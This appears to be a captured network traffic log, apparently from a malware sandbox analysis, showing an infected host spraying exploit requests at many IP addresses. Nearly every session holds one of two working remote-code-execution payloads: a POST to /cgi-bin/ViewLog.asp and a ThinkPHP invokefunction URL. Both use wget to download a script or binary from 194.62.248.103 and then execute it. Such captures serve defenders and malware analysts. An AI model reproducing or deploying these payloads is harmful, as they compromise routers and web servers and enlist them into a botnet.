                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.858966112 CEST259INHTTP/1.1 501 Not Implemented
                                                        Connection: Keep-Alive
                                                        Content-Length: 121
                                                        Date: Sun, 14 Apr 2024 14:36:04 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        793192.168.2.233413894.122.215.288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.555255890 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        794192.168.2.233639094.121.29.1398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.572199106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        795192.168.2.234894294.123.144.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.572403908 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        796192.168.2.235410488.99.141.17580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:00.385126114 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:00.693023920 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        797192.168.2.233628088.101.25.20780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:00.386210918 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:00.701081038 CEST238INHTTP/1.1 404 Not Found
                                                        Content-Length: 0
                                                        Date: Sun, 14 Apr 2024 14:37:04 GMT
                                                        X-Frame-Options: sameorigin
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        798192.168.2.236017288.196.124.3580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:00.411792040 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:01.443922997 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.452711105 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:04.500430107 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:08.787697077 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:16.982547998 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:34.640099049 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:38:07.403709888 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        799192.168.2.234688231.207.38.1018080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.237333059 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:01.535039902 CEST304INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:01 GMT
                                                        Server: Apache
                                                        Content-Length: 126
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        800192.168.2.235419631.136.177.1428080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.256653070 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:02.228625059 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:04.180633068 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.275787115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.210884094 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:31.824521065 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:03.308322906 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        801192.168.2.233952862.49.176.1698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.527333975 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        802192.168.2.234846462.20.217.158080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.538088083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:01.838727951 CEST711INHTTP/1.0 404 Not Found !!!
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        803192.168.2.234781094.110.185.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.563684940 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        804192.168.2.235230894.122.6.1538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.866895914 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        805192.168.2.235922894.120.58.1548080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.867048025 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        806192.168.2.235093694.122.236.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.867321014 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        807192.168.2.236094695.106.18.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.871026993 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        808192.168.2.235780095.70.183.918080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:01.887449980 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        809192.168.2.236096495.101.226.19780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.060062885 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.353513002 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Connection: close
